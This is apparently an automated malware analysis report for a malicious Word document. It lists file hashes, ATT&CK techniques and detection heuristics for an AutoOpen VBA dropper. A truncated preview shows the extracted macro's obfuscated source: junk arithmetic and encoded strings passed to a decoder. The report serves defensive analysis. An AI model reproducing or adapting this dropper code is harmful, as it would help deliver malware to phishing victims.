Office (OLE) malware analysis — malicious · a484a82ff55c35c5

MALICIOUS

Office (OLE)

229.5 KB Created: 2018-03-06 09:29:00 Authoring application: Microsoft Office Word First seen: 2019-12-10

MD5: 19bf682140b54846bbb552c1037cb17e SHA-1: 3088eeb0cf03931a04112df52f0964d5ece7525b SHA-256: a484a82ff55c35c5cd104730a63ffd94e0576f3f5b39a253eb2abf63ac50524e

224 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate or Obfuscate

The sample is a malicious OLE document containing a VBA macro. The macro is triggered by the AutoOpen function and utilizes CreateObject to likely download and execute a second-stage payload. The presence of a large encoded blob and the ClamAV detection 'Doc.Dropper.Agent-6465893-0' further support its malicious nature as a dropper.

Heuristics 8

ClamAV: Doc.Dropper.Agent-6465893-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6465893-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	71077 bytes
SHA-256: `e577f3de7437367f5e73044410b257690b69be61e7241dd939e412615905ef5b`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 22 long base64-like blob(s).
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "WkdikuwfsUGXk" Function AZzQGzu() On Error Resume Next aiuqc = "XjPNCzmws=%nRjcHhkidLS" hzbzCatzJGW = 8515361 / Atn(uimouFNDzENj) / (5700805 - AjGYSjWk / 4936686 - Sqr(ubRphdES * CStr(KZnVEGHROD / Sgn(7748168 - CDate(2977889 / EruZwFMINJ * 1693804 * Sqr(tSnXWWAv))))) + (SqMNCS - 2120101 / 3499445 / CLng(1549857))) PzRioaoFNa = 6316282 / Atn(DRXavHjwFTwQ) / (5973563 - KoTts / 6448396 - Sqr(UVlBiMumBqFc * CStr(PbuNcOpBp / Sgn(7708053 - CDate(4219710 / hLrirYPzzj * 9296164 * Sqr(ZMvlMEcqnHmi))))) + (GRdrmihPaBACI - 1994580 / 3569656 / CLng(8126592))) zhKUWZdMC = zmQYRiuntioiXp + dd333h3sd(aiuqc, 12, 3) SuckH = "XSn=%1rav% tevOCRztYwVMzDActaSMREYfCcIRltHjqOVP" lkavvcAcMjF = 7475174 / Atn(LCUGJkLo) / (4924291 - IdBBPX / 201294 - Sqr(WFfHXDhpZl * CStr(AoGnCCJY / Sgn(5947180 - CDate(224614 / HBELpSmQQPzwah * 7443380 * Sqr(iQYUK))))) + (VZTBpzzGz - 4254113 / 5638369 / CLng(4696775))) Rvwtiw = 9723039 / Atn(CMOPDJVDCp) / (6185223 - PwiHGj / 7568012 - Sqr(ffrncmRJQbV * CStr(iIASC / Sgn(1745143 - CDate(3330241 / ESWiV * 6731113 * Sqr(AcrPwlRwWUa))))) + (QsMmbUdYGwLF - 9482722 / 2970475 / CLng(7254897))) IjbHwnlD = affIoPSEpl + dd333h3sd(SuckH, 35, 10) WbCzP = "wzUu%1rav%!=%7dZCtiLkPdf" zctRMFDOb = 8913746 / Atn(PjqwitfNj) / (351608 - uZSRmnTAU / 9646408 - Sqr(IJjaGifwtscjp * CStr(NjfuhBuU / Sgn(6073572 - CDate(43423 / GmkXi * 5079743 * Sqr(ZYahNEnBhk))))) + (jRtdBZ - 648448 / 7717404 / CLng(1119317))) irGfVwNzSCb = 7438839 / Atn(zodjWzrvYPSCGR) / (8033077 - WaGfUJMziKd / 7222315 - Sqr(UqUncb * CStr(DdhoKlLsOPmM / Sgn(2204804 - CDate(8904437 / NzGcnbiBLVF * 7168373 * Sqr(ZzPdq))))) + (btsSV - 6614322 / 9747585 / CLng(3901552))) VqWHEXQHj = MJNStCQjYL + dd333h3sd(WbCzP, 11, 10) BrWzWEHGT = "PkVLNUbwJuXCPqbmdvrAHsrN% tes&&!CLmpnKwHbSSdr" jzLlbrP = 4980446 / Atn(NXRonn) / (4166220 - rVWpk / 8410157 - Sqr(CffCi * CStr(FhdKHavDwH / Sgn(6069775 - CDate(1494618 / LHYhBd * 2043736 * Sqr(VuAIwdJt))))) + (tMrjHqnijN - 5081182 / 9990343 / CLng(9107871))) WZuoMtGX = 2870009 / Atn(hifuizdZXLjnc) / (278497 - zlJVNT / 3085838 - Sqr(EQkDUPkQa * CStr(JbSzOPcQnUV / Sgn(4661498 - CDate(673701 / cWQoqZB * 4573334 * Sqr(EbiuuJJn))))) + (JHTZrzXutwfvE - 6125062 / 2580590 / CLng(4939032))) IzqiHnjc = TXRaPncVjAnJ + dd333h3sd(BrWzWEHGT, 14, 15) jqpitK = "rKKbzQEmmzMYSfulYQLm&&abMzSTo=%YBRPEzknCUFEz" PjAWOrji = 2657719 / Atn(oFoaSESYwtiaX) / (2004708 - YjUwz / 1334302 - Sqr(JDipuVOPGqbPRL * CStr(MhhMwXVHj / Sgn(9993551 - CDate(3964336 / NNVjOjpvkscKzJ * 6580566 * Sqr(swHsoCXmOmIb))))) + (vCpZWBCkKMjc - 3040185 / 7109627 / CLng(3947506))) BNUzVBQL = 934840 / Atn(OooiPhscK) / (2083141 - iRbbOHppnkbIf / 484729 - Sqr(mbQYRChrYUm * CStr(fUwzMq / Sgn(2387926 - CDate(295609 / kEOIviRmnfJjh * 9081770 * Sqr(MltnAaDH))))) + (CJVqmPSTAp - 293065 / 4322582 / CLng(357691))) mXbIjZinj = wwvaAdlKNV + dd333h3sd(jqpitK, 8, 17) OEwtGDdEE = "pPFPF%2rav%!=%8rav% teTDVMlYZhTJzUIiKiZZvliFAQNaiuZV" XAmpnIGfto = 99805 / Atn(RErKiFPYZivkka) / (793809 - ahIAZEijrPjGP / 6237924 - Sqr(mJViLnivVzraAw * CStr(uuVcVci / Sgn(9916960 - CDate(4209834 / ZHSSVJJ * 8585620 * Sqr(IaPwsFvmnDhd))))) + (njVpknLTIJ - 9870391 / 3161591 / CLng(7341081))) QzdDAj = 6154190 / Atn(czniiNn) / (7018008 - zdXZprwokvU / 7434021 - Sqr(jZWhTARPjGZkJn * CStr(wvRzvqr / Sgn(1379187 - CDate(3087657 / iQNKjqLYjTOM * 128047 * Sqr(nTPRXzpfEhpoi))))) + (qGoSGvpkD - 964395 / 9998205 / CLng(2945403))) NNzOcwOF = WYQElodZ + dd333h3sd(OEwtGDdEE, 31, 17) IzsjCDSXf = "rdQMkzoATvMwrMopO% teWXp" EqwwGJ = 8486177 / Atn(JFLAzubXDm) / (207605 - OHFEf / 8875672 - Sqr(XSKwrKJarNjGdU * CStr(wXXTzjYuuTfRf / Sgn(1528711 - CDate(1563998 / aSiUIzI * 3890966 * Sqr(oUkJUjXhYIijM))))) + (PwXQcLsdSiwInv - 9991313 / 6519322 / CLng(9931146))) wTCkzl = 2758183 / Atn(dKMok) / (4858132 - HkGzZhOXSVki / 6154199 - Sqr ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.